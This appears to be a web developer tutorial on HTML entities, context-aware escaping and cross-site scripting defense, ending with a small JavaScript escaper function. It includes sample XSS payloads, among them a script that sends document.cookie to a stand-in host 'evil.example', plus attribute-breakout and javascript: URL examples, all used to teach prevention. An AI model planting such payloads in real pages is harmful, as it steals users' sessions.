Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.

What an HTML entity actually is

An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:

  • Named entities like
    text
    <
    ,
    text
    >
    ,
    text
    &
    , and
    text
    "
    . Each maps to a specific character.
  • Numeric character references like
    text
    <
    (decimal) or
    text
    <
    (hexadecimal), both of which produce
    text
    <
    .

When the browser's parser encounters

text
&lt;
, it renders a literal less-than sign on the page instead of starting a tag. That single substitution is the entire mechanism behind both correct display and a major class of injection defense.

The characters that matter

The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:

CharacterWhy it's dangerousEntity
text
<
Opens a tag
text
&lt;
text
>
Closes a tag
text
&gt;
text
&
Starts an entity reference
text
&amp;
text
"
Terminates a double-quoted attribute
text
&quot;
text
'
Terminates a single-quoted attribute
text
&#39;
or
text
&apos;

The ampersand is the one people forget. If you escape

text
<
to
text
&lt;
but leave a raw
text
&
alone, then content like
text
Tom & Jerry &lt;b&gt;
can produce ambiguous or double-decoded output. Always escape
text
&
first, before anything else, so you never re-escape the ampersands you just introduced.

Why you escape: the two failure modes

There are two distinct reasons to escape, and conflating them leads to sloppy fixes.

Broken markup

If a user types a product review that says

text
I rate this 3 < 5 stars
, and you drop that string straight into your HTML, the browser sees
text
<
followed by
text
5 stars
and tries to parse a tag. The rest of your paragraph may vanish, the layout may collapse, or the page may swallow content until it finds a stray
text
>
. This is a correctness bug, not necessarily a security one, but it is the same root cause.

Cross-site scripting (XSS)

Now imagine the user types this instead:

html
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping

text
<
to
text
&lt;
turns that payload into harmless visible text: the browser displays the characters and never runs them.

XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.

Context-aware escaping

The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.

HTML text content

Between tags, like

text
<p>HERE</p>
, you need to handle
text
<
,
text
>
, and
text
&
. This is the most common case and the one most libraries default to.

html
<p>3 &lt; 5 &amp; rising</p>

HTML attributes

Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:

html
<!-- Dangerous: value breaks out of the quotes --> <input value=""><script>alert(1)</script>"> <!-- Safe: quote is escaped --> <input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">

Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.

JavaScript and CSS contexts

HTML entities do not work inside a

text
<script>
block or a
text
style
attribute. If you put user data into JavaScript, the right tool is JSON encoding or JavaScript string escaping, not
text
&lt;
. A frequent mistake:

html
<script> // HTML-escaping here does nothing useful and can break the JS var name = "USER_INPUT"; </script>

If

text
USER_INPUT
contains
text
";attackerCode();//
, you have script injection even though there's not a single
text
<
involved. The fix is to serialize the value as JSON (
text
JSON.stringify
) and, ideally, to avoid generating inline script from untrusted data at all.

URLs

A value placed in an

text
href
or
text
src
needs URL encoding, plus a scheme check. HTML-escaping a URL does nothing to stop
text
javascript:alert(1)
from running when clicked. Validate that the scheme is
text
http
,
text
https
, or
text
mailto
before trusting it.

The takeaway: pick the escaping function that matches the destination context. The same byte of user input may need three different treatments depending on whether it lands in text, an attribute, a script string, or a URL.

Named vs numeric entities

For the security-critical characters, named and numeric entities are interchangeable in effect:

  • text
    &lt;
    and
    text
    &#60;
    and
    text
    &#x3C;
    all render
    text
    <
    .
  • text
    &amp;
    and
    text
    &#38;
    both render
    text
    &
    .

Practical guidance:

  • Named entities are more readable for the common set (
    text
    &lt;
    ,
    text
    &gt;
    ,
    text
    &amp;
    ,
    text
    &quot;
    ). Prefer them in hand-written markup.
  • Numeric references are universal. Any Unicode code point can be written as
    text
    &#NNNN;
    or
    text
    &#xHHHH;
    , which matters for characters that have no named entity.
  • text
    &apos;
    is risky in old contexts.
    It is valid in HTML5 but was not defined in HTML 4 and historically failed in some XML/email rendering paths. When escaping single quotes defensively,
    text
    &#39;
    is the safer choice.

A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the

text
&apos;
compatibility wrinkle entirely.

If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.

Common mistakes

Escaping on input instead of output

A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with

text
&amp;
showing up in plain-text emails. Store raw, escape at output, where you know the exact destination context.

Double escaping

If you escape a value twice,

text
&
becomes
text
&amp;
becomes
text
&amp;amp;
, and users see literal
text
&amp;
on the page. This usually happens when a template engine auto-escapes and your code also escapes manually. Know whether your framework escapes by default (most modern ones do for interpolated values) and don't stack a second pass on top.

Trusting an allowlist of "safe" characters

Blocklisting

text
<script>
or stripping the word "javascript" is not escaping and does not work. Attackers use
text
<img src=x onerror=...>
, SVG event handlers, mixed-case
text
JaVaScRiPt:
, and dozens of other vectors. Encode the structural characters; don't try to outguess every payload.

Forgetting the attribute quote

Escaping

text
<
and
text
>
but not the quote character leaves attribute-context injection wide open, as shown above. If your data goes in an attribute, the delimiter quote is non-negotiable.

Marking strings as "safe" to silence the framework

Every templating system has an escape hatch (

text
dangerouslySetInnerHTML
,
text
|safe
,
text
v-html
,
text
mark_safe
). Each one disables the auto-escaping that was protecting you. Reserve these for HTML you generated yourself and never for anything derived from user input without sanitization.

A minimal correct escaper

For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:

javascript
function escapeHtml(s) { return String(s) .replace(/&/g, '&amp;') // must be first .replace(/</g, '&lt;') .replace(/>/g, '&gt;') .replace(/"/g, '&quot;') .replace(/'/g, '&#39;'); }

This is deliberately small. It is correct for text and attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in

text
href
values. Real applications should lean on their framework's context-aware auto-escaping rather than hand-rolling this everywhere; the snippet exists to show that the core mechanism is simple and to make the ordering explicit.

Layers beyond escaping

Escaping is the primary defense, but pair it with a couple of cheap reinforcements:

  • A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
  • HttpOnly cookies keep session tokens out of reach of any script that does execute.

Neither replaces escaping; both reduce the blast radius when something gets through.

Seeing it in practice

The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw

text
<
and
text
&
into our live HTML preview and then escape it to see how the same string flips from broken or executable to inert, readable text. If you only remember one rule from this article, make it this: decide what context the data lands in, escape for that context at the moment of output, and never trust a string to escape itself.